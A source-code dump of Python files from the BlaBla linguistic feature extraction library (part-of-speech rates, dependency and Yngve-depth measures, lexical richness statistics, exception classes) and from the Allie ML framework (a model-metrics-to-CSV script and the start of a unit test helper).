The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SUBORDINATING_CONJUNCTION)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Symbol_Rate(object):
"""Class to calculate the symbol rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun rate
Args:
None
Returns:
The total number of pronouns to the total number of words
"""
tot_num_pron, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(SYMBOL)
tot_num_words += so.num_words()
return tot_num_pron / tot_num_words
class Verb_Rate(object):
"""Class to calculate the verb rate
Ref: https://pubmed.ncbi.nlm.nih.gov/28321196/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of verbs to the total number of words
"""
tot_num_verbs, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_words += so.num_words()
return tot_num_verbs / tot_num_words
class Demonstrative_Rate(object):
"""Class to calculate the demonstratives rate
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the verb rate
Args:
None
Returns:
The total number of demonstratives to the total number of words
"""
tot_num_demons, tot_num_words = 0, 0
for so in self.sentence_objs:
tot_num_demons += num_demonstratives(so.stanza_doc)
tot_num_words += so.num_words()
return tot_num_demons / tot_num_words
class Possessive_Rate(object):
"""Class to calculate the possessive rate
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC3642700/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the possessive rate
Args:
None
Returns:
The total number of adjectives and pronouns to the total number of words
"""
tot_num_adjs, tot_num_pron, tot_num_words = 0, 0, 0
for so in self.sentence_objs:
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_words += so.num_words()
return (tot_num_adjs + tot_num_pron) / tot_num_words
class Noun_Verb_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the number of verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun to verb
Args:
None
Returns:
The total number of nouns to the number of verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if tot_num_verbs != 0:
return tot_num_nouns / tot_num_verbs
return NOT_AVAILABLE
class Noun_Ratio(object):
"""Class to calculate the ratio of the number of nouns to the total number of nouns and verbs
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the noun ratio
Args:
None
Returns:
The total number of nouns to the total number of nouns and verbs
"""
tot_num_nouns, tot_num_verbs = 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
if (tot_num_nouns + tot_num_verbs) != 0:
return tot_num_nouns / (tot_num_nouns + tot_num_verbs)
class Pronoun_Noun_Ratio(object):
"""Class to calculate the ratio of the number of pronouns to the total number of nouns
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the pronoun to noun ratio
Args:
None
Returns:
The ratio of the total number of pronouns to the number of nouns
"""
tot_num_prons, tot_num_nouns = 0, 0
for so in self.sentence_objs:
tot_num_prons += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if tot_num_nouns != 0:
return tot_num_prons / tot_num_nouns
return NOT_AVAILABLE
class Total_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = 0
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist += np.sum([abs(int(dep['id']) - dep['head']) for dep in sd])
return tot_dist
class Average_Dependency_Distance(object):
"""Class to calculate the sum of dependency distances
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total dependency distance across all sentences
Args:
None
Returns:
the sum of dependency distances
"""
tot_dist = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
tot_dist.append(sum([abs(int(dep['id']) - dep['head']) for dep in sd]))
if tot_dist:
return np.mean(tot_dist)
return NOT_AVAILABLE
class Total_Dependencies(object):
"""Class to calculate the number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of unique dependencies across sentences
Args:
None
Returns:
the total number of unique dependencies
"""
deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels.extend([dep['deprel'] for dep in sd])
return len(set(deprels))
class Average_Dependencies(object):
"""Class to calculate the average number of unique syntactic dependencies
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of unique dependencies across sentences
Args:
None
Returns:
the average number of unique dependencies
"""
num_deprels = []
for so in self.sentence_objs:
sd = so.stanza_doc.to_dict()[0]
deprels = set([dep['deprel'] for dep in sd])
num_deprels.append(len(deprels))
if num_deprels:
return np.mean(num_deprels)
return NOT_AVAILABLE
class Closed_Class_Word_Rate(object):
"""Class to calculate the proportion of closed class words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of close class words
Args:
None
Returns:
The ratio of the total number of determiners, prepositions, pronouns and conjunctions to the total number of words
"""
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
) / tot_num_words
class Open_Class_Word_Rate(object):
"""Class to calculate the proportion of open class word_count
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of open class words
Args:
None
Returns:
The ratio of the total number of nouns, verbs, adjectives and adverbs to the total number of words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs, tot_num_words = (
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_words += so.num_words()
return (
tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
) / tot_num_words
class Content_Density(object):
"""Class to calculate the content density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the content density of words
Args:
None
Returns:
The ratio of the total number of open class words to the total number of closed class words
"""
tot_num_nouns, tot_num_verbs, tot_num_adjs, tot_num_advs = 0, 0, 0, 0
tot_num_det, tot_num_prep, tot_num_pron, tot_num_cconj = 0, 0, 0, 0
for so in self.sentence_objs:
tot_num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
for so in self.sentence_objs:
tot_num_det += so.pos_tag_counter.get_pos_tag_count(DETERMINER)
tot_num_prep += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_pron += so.pos_tag_counter.get_pos_tag_count(PRONOUN)
tot_num_cconj += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
numerator = tot_num_nouns + tot_num_verbs + tot_num_adjs + tot_num_advs
denominator = tot_num_det + tot_num_prep + tot_num_pron + tot_num_cconj
if denominator == 0:
return NOT_AVAILABLE
return numerator / denominator
class Idea_Density(object):
"""Class to calculate the idea density of words
Ref: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5337522/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the idea density of words
Args:
None
Returns:
The ratio of the total number of verbs, adjectives, adverbs, prepositions, conjunctions to the number of words
"""
(
tot_num_verbs,
tot_num_adjs,
tot_num_advs,
tot_num_preps,
tot_num_cconjs,
tot_num_words,
) = (
0,
0,
0,
0,
0,
0,
)
for so in self.sentence_objs:
tot_num_verbs += so.pos_tag_counter.get_pos_tag_count(VERB)
tot_num_adjs += so.pos_tag_counter.get_pos_tag_count(ADJECTIVE)
tot_num_advs += so.pos_tag_counter.get_pos_tag_count(ADVERB)
tot_num_preps += so.pos_tag_counter.get_pos_tag_count(ADPOSITION)
tot_num_cconjs += so.pos_tag_counter.get_pos_tag_count(CONJUNCTION)
tot_num_words += so.num_words()
return (
tot_num_verbs + tot_num_adjs + tot_num_advs + tot_num_preps + tot_num_cconjs
) / tot_num_words
class Honore_Statistic(object):
"""Class to calculate the honore's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the honore's statistic
Args:
None
Returns:
The honore's statistic of the words
"""
all_words = []
num_unique_words_spoken, num_words_spoken_only_once = 0, 0
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
word_counts = dict(Counter(all_words))
for key, val in word_counts.items():
if val == 1:
num_words_spoken_only_once += 1
num_words = len(all_words)
if (num_words_spoken_only_once == num_unique_words_spoken) or (num_unique_words_spoken == 0) or (num_words == 0):
return NOT_AVAILABLE
honore_statistic = (100 * math.log(num_words)) / (
1 - (num_words_spoken_only_once) / (num_unique_words_spoken)
)
return honore_statistic
class Brunet_Index(object):
"""Class to calculate the brunet's statistic
Ref: https://www.aclweb.org/anthology/W16-1902.pdf
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the brunet's statistic
Args:
None
Returns:
The brunet's statistic of the words
"""
num_unique_words_spoken = 0
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
num_unique_words_spoken = len(set(all_words))
num_words = len(all_words)
brunet_index = math.pow(num_words, math.pow(num_unique_words_spoken, -0.165))
return brunet_index
class Type_Token_Ratio(object):
"""Class to calculate the type-token ratio
Ref: https://www.tandfonline.com/doi/abs/10.1080/02687038.2017.1303441
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the type-token statistic
Args:
None
Returns:
The ratio of the number of word types to the number of words
"""
all_words = []
all_word_lemmas = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
all_word_lemmas.extend(
[word.lemma for word in so.stanza_doc.sentences[0].words]
)
num_word_types = len(set(all_word_lemmas))
num_words = len(all_words)
return num_word_types / num_words
class Word_Length(object):
"""Class to calculate the mean word length
Ref: https://pubmed.ncbi.nlm.nih.gov/26484921/
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the mean word length
Args:
None
Returns:
The mean length of the word across all sentences
"""
all_words = []
for so in self.sentence_objs:
all_words.extend([word.text for word in so.stanza_doc.sentences[0].words])
mean_word_length = np.mean([len(word) for word in all_words])
return mean_word_length
def lexico_semantic_feature_processor(sentence_objs, feature, **kwArgs):
"""This method Returns the lexico semantic features across all the sentences depending on the type of feature requested
Args:
sentence_objs (list<Sentence>): a list of Sentence objects
feature (str): a string name for the requested feature
Returns:
the feature value
"""
nr = globals()[feature.title()](sentence_objs)
return nr.handle()
```
#### File: blabla/sentence_aggregators/syntactic_feature_aggregator.py
```python
from blabla.sentence_processor.syntactic_feature_engine import *
from blabla.utils.global_params import *
class Num_Noun_Phrases(object):
"""Class to calculate the number of noun phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of noun phrases over all sentences
Args:
None
Returns:
The total number of noun phrases over all sentences
"""
tot_num_noun_phrases = 0
for so in self.sentence_objs:
tot_num_noun_phrases += num_noun_phrases(so.const_pt)
return tot_num_noun_phrases
class Noun_Phrase_Rate(object):
"""Class to calculate the average number of noun phrases over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of noun phrases over all sentences
Args:
None
Returns:
The average number of noun phrases over all sentences
"""
tot_num_noun_phrases = 0
for so in self.sentence_objs:
tot_num_noun_phrases += num_noun_phrases(so.const_pt)
return tot_num_noun_phrases / len(self.sentence_objs)
class Num_Verb_Phrases(object):
"""Class to calculate the number of verb phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of verb phrases over all sentences
Args:
None
Returns:
The total number of verb phrases over all sentences
"""
tot_num_verb_phrases = 0
for so in self.sentence_objs:
tot_num_verb_phrases += num_verb_phrases(so.const_pt)
return tot_num_verb_phrases
class Verb_Phrase_Rate(object):
"""Class to calculate the average number of verb phrases over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of verb phrases over all sentences
Args:
None
Returns:
The average number of verb phrases over all sentences
"""
tot_num_verb_phrases = 0
for so in self.sentence_objs:
tot_num_verb_phrases += num_verb_phrases(so.const_pt)
return tot_num_verb_phrases / len(self.sentence_objs)
class Num_Clauses(object):
"""Class to calculate the total number of clauses over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of clauses over all sentences
Args:
None
Returns:
The total number of clauses over all sentences
"""
tot_num_clauses = 0
for so in self.sentence_objs:
tot_num_clauses += num_clauses(so.const_pt)
return tot_num_clauses
class Clause_Rate(object):
"""Class to calculate the number of clauses per sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average number of clauses over all sentences
Args:
None
Returns:
The average number of clauses over all sentences
"""
tot_num_clauses = 0
for so in self.sentence_objs:
tot_num_clauses += num_clauses(so.const_pt)
return tot_num_clauses / len(self.sentence_objs)
class Num_Infinitive_Phrases(object):
"""Class to calculate the total number of infinitive phrases
Note: This feature is available only for English
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of infinitive phrases
Args:
None
Returns:
The total number of infinitive phrases over all sentences
"""
tot_num_inf_phrases = 0
for so in self.sentence_objs:
tot_num_inf_phrases += num_infinitive_phrases(so.stanza_doc)
return tot_num_inf_phrases
class Infinitive_Phrase_Rate(object):
"""Class to calculate the number of infinitive phrases per sentence
Note: This feature is available only for English
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of infinitive phrases per sentence
Args:
None
Returns:
The number of infinitive phrases per sentences
"""
tot_num_inf_phrases = 0
for so in self.sentence_objs:
tot_num_inf_phrases += num_infinitive_phrases(so.stanza_doc)
return tot_num_inf_phrases / len(self.sentence_objs)
class Num_Dependent_Clauses(object):
"""Class to calculate the total number of dependent clauses
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of dependent clauses
Args:
None
Returns:
The total number of dependent clauses
"""
tot_num_dep_clauses = 0
for so in self.sentence_objs:
tot_num_dep_clauses += num_dependent_clauses(so.const_pt)
return tot_num_dep_clauses
class Dependent_Clause_Rate(object):
"""Class to calculate the number of dependent clauses per sentence
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of dependent clauses per sentence
Args:
None
Returns:
The number of dependent clauses per sentences
"""
tot_num_dep_clauses = 0
for so in self.sentence_objs:
tot_num_dep_clauses += num_dependent_clauses(so.const_pt)
return tot_num_dep_clauses / len(self.sentence_objs)
class Num_Prepositional_Phrases(object):
"""Class to calculate the total number of prepositional phrases
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total number of prepositional phrases
Args:
None
Returns:
The total number of prepositional phrases
"""
tot_num_prep_phrases = 0
for so in self.sentence_objs:
tot_num_prep_phrases += num_prepositional_phrases(so.const_pt)
return tot_num_prep_phrases
class Prepositional_Phrase_Rate(object):
"""Class to calculate the number of prepositional phrases per sentence
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the number of prepositional phrases per sentence
Args:
None
Returns:
The number of prepositional phrases per sentence
"""
tot_num_prep_phrases = 0
for so in self.sentence_objs:
tot_num_prep_phrases += num_prepositional_phrases(so.const_pt)
return tot_num_prep_phrases / len(self.sentence_objs)
class Prop_Nouns_With_Det(object):
"""Class to calculate the proportion of nouns with determiners
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of nouns that have a determiner as their dependency
Args:
None
Returns:
The number of nouns with determiners as their dependency
"""
num_nouns_with_determiners, num_nouns = 0, 0
for so in self.sentence_objs:
num_nouns_with_determiners += num_nouns_with_det(so.stanza_doc)
num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if num_nouns != 0:
return num_nouns_with_determiners / num_nouns
return NOT_AVAILABLE
class Prop_Nouns_With_Adj(object):
"""Class to calculate the proportion of nouns with adjectives
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the proportion of nouns that have a adjective as their dependency
Args:
None
Returns:
The number of nouns with adjective as their dependency
"""
num_nouns_with_adjectives, num_nouns = 0, 0
for so in self.sentence_objs:
num_nouns_with_adjectives += num_nouns_with_adj(so.stanza_doc)
num_nouns += so.pos_tag_counter.get_pos_tag_count(NOUN)
if num_nouns != 0:
return num_nouns_with_adjectives / num_nouns
return NOT_AVAILABLE
class Max_Yngve_Depth(object):
"""Class to calculate the maximum Yngve depth averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the maximum Yngve depth averaged over all sentences
Args:
None
Returns:
The maximum Yngve depth averaged over all sentences
"""
total_max_yngve_depth = 0
for so in self.sentence_objs:
total_max_yngve_depth += max_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_max_yngve_depth / num_sentences
class Mean_Yngve_Depth(object):
"""Class to calculate the mean Yngve depth of each sentence, averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the mean Yngve depth of each sentence, averaged over all sentences
Args:
None
Returns:
The mean Yngve depth of each sentence, averaged over all sentences
"""
total_mean_yngve_depth = 0
for so in self.sentence_objs:
total_mean_yngve_depth += mean_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_mean_yngve_depth / num_sentences
class Total_Yngve_Depth(object):
"""Class to calculate the total Yngve depth of each sentence, averaged over all sentences
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the total Yngve depth of each sentence, averaged over all sentences
Args:
None
Returns:
The total Yngve depth of each sentence, averaged over all sentences
"""
total_all_yngve_depth = 0
for so in self.sentence_objs:
total_all_yngve_depth += total_yngve_depth(so.yngve_tree_root)
num_sentences = len(self.sentence_objs)
return total_all_yngve_depth / num_sentences
class Parse_Tree_Height(object):
"""Class to calculate the constituency parse tree height
"""
def __init__(self, sentence_objs):
"""The init method to initialize with an array of sentence objects
"""
self.sentence_objs = sentence_objs
def handle(self):
"""Method to calculcate the average height of the constituency parse tree over all sentences
Args:
None
Returns:
The constituency parse tree height averaged over all sentences
"""
tot_const_pt_height = 0
for so in self.sentence_objs:
tot_const_pt_height += const_pt_height(so.const_pt)
return tot_const_pt_height / len(self.sentence_objs)
def syntactic_feature_processor(sentence_objs, feature, **kwArgs):
"""This method Returns the syntactic features across all the sentences depending on the type of feature requested
Args:
sentence_objs (list<Sentence>): a list of Sentence objects
feature (str): a string name for the requested feature
Returns:
the feature value
"""
nr = globals()[feature.title()](sentence_objs)
return nr.handle()
```
#### File: blabla/sentence_processor/lexico_semantic_feature_engine.py
```python
from collections import Counter
import math
from blabla.utils.global_params import *
from blabla.utils import *
def num_demonstratives(stanza_doc):
"""The number of demonstravives
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
(int): the number of demonstravives
"""
return len([1 for word in stanza_doc.sentences[0].words if ((word.feats is not None) and ('PronType=Dem' in word.feats))])
def num_unique_words(stanza_doc):
"""Returns the number of unique words
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
number of unique words
"""
return len(set([word.text for word in stanza_doc.sentences[0].words]))
def num_word_types(stanza_doc):
"""Returns the number of word types
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
number of word types
"""
return len(set([word.lemma for word in stanza_doc.sentences[0].words]))
def compute_mean_word_length(stanza_doc):
"""Returns the mean word length
Args:
stanza_doc (nltk.Tree): The dependency parse tree
Returns:
mean length of all words in the sentence
"""
return np.mean([len(word.text) for word in stanza_doc.sentences[0].words])
```
#### File: blabla/sentence_processor/pos_tag_counting_engine.py
```python
import stanza
class PosTagCounter(object):
"""The class that counts the number of pos tags of various types in a sentence
"""
def __init__(self, stanza_doc):
"""The initialization method that take a dependency parse tree as input
Args:
stanza_doc (nltk.Tree): the dependency parse tree
Returns:
None
"""
self.stanza_doc = stanza_doc
def get_pos_tag_count(self, pos_tag):
"""Returns the number of nouns
Args:
None
Returns:
number of nouns in the sentence
"""
return len(
[
word
for word in self.stanza_doc.sentences[0].words
if (word.pos == pos_tag)
]
)
```
#### File: blabla/utils/exceptions.py
```python
class EnvPathException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class EmptyStringException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidFormatException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidYamlFileException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InavlidJSONFileException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class InvalidFeatureException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class FileError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class FeatureExtractionException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class POSTagExtractionFailedException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class DependencyParsingTreeException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ConstituencyTreeParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class YngveTreeConstructionException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class LexicoSemanticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class MorphoSyntacticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class SyntacticParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class DiscourseParsingException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
```
#### File: allie/models/model2csv.py
```python
import os, json
import pandas as pd
def id_folder():
curdir=os.getcwd()
directories=['audio_models', 'text_models', 'image_models', 'video_models', 'csv_models']
metrics_list=list()
model_names=list()
for i in range(len(directories)):
try:
os.chdir(curdir)
os.chdir(directories[i])
listdir=os.listdir()
folders=list()
for j in range(len(listdir)):
if listdir[j].find('.') < 0:
folders.append(listdir[j])
curdir2=os.getcwd()
for j in range(len(folders)):
os.chdir(curdir2)
os.chdir(folders[j])
os.chdir('model')
listdir2=os.listdir()
jsonfile=folders[j]+'.json'
for k in range(len(listdir2)):
if listdir2[k] == jsonfile:
g=json.load(open(jsonfile))
metrics_=g['metrics']
metrics_list.append(metrics_)
model_names.append(jsonfile[0:-5])
except:
pass
# print(directories[i])
# print('does not exist...')
return metrics_list, model_names
curdir=os.getcwd()
metrics_list, model_names=id_folder()
# regression models
meanabsolute_errors=list()
meansquared_errors=list()
median_errors=list()
r2_scores=list()
regression_models=list()
for i in range(len(model_names)):
try:
meanabsolute_errors.append(metrics_list[i]['mean_absolute_error'])
meansquared_errors.append(metrics_list[i]['mean_squared_error'])
median_errors.append(metrics_list[i]['median_absolute_error'])
r2_scores.append(metrics_list[i]['r2_score'])
regression_models.append(model_names[i])
except:
pass
# classification models
accuracies=list()
roc_curve=list()
classification_models=list()
for i in range(len(model_names)):
try:
accuracies.append(metrics_list[i]['accuracy'])
roc_curve.append(metrics_list[i]['roc_auc'])
classification_models.append(model_names[i])
except:
pass
classification_data={'model names': classification_models,
'accuracies': accuracies,
'roc_auc': roc_curve}
regression_data={'model_names': regression_models,
'mean_absolute_errors': meanabsolute_errors,
'mean_squared_errors': meansquared_errors,
'r2_scores': r2_scores}
os.chdir(curdir)
df=pd.DataFrame.from_dict(classification_data)
df.to_csv('classification_models.csv', index=False)
df=pd.DataFrame.from_dict(regression_data)
df.to_csv('regression_models.csv', index=False)
```
#### File: allie/tests/unit_test.py
```python
import unittest, os, shutil, time, uuid, random, json, pickle
import numpy as np
import pandas as pd
###############################################################
## HELPER FUNCTIONS
## Below are some helper functions to reduce code redundancy
## During the unit testing process.
###############################################################
def prev_dir(directory):
'''
take in a directory and get the next innermost directory
in the tree structure.
For example,
directory = /Users/jim/desktop
prev_dir(directory) --> /Users/jim
'''
g=directory.split('/')
dir_=''
for i in range(len(g)):
if i != len(g)-1:
if i==0:
dir_=dir_+g[i]
else:
dir_=dir_+'/'+g[i]
# print(dir_)
return dir_
def clean_file(directory, clean_dir, cur_dir, train_dir, file):
'''
take in a few directories and output a clean file for audio,
text, image, and video files.
test_audio.wav --> test_audio.wav (clean)
'''
os.chdir(train_dir)
try:
os.mkdir(directory)
except:
shutil.rmtree(directory)
os.mkdir(directory)
os.chdir(directory)
shutil.copy(cur_dir+'/'+file, train_dir+'/'+directory+'/'+file)
os.chdir(clean_dir+'/'+directory)
os.system('python3 clean.py %s'%(train_dir+'/'+directory))
os.chdir(train_dir+'/'+directory)
listdir=os.listdir()
b=False
if len(listdir) == 1 and file.endswith('.csv') == False:
b=True
elif len(listdir) == 2 and file.endswith('.csv') == True:
b=True
# remove temp directory
os.chdir(train_dir)
shutil.rmtree(train_dir+'/'+directory)
msg='failed cleaning process, file does not exist in directory'
return b, msg
def augment_file(directory, augment_dir, cur_dir, train_dir, file):
'''
take in a few directories and output augmented files for audio,
text, image, and video files.
test_audio.wav --> test_audio.wav + tsaug_test_audio.wav
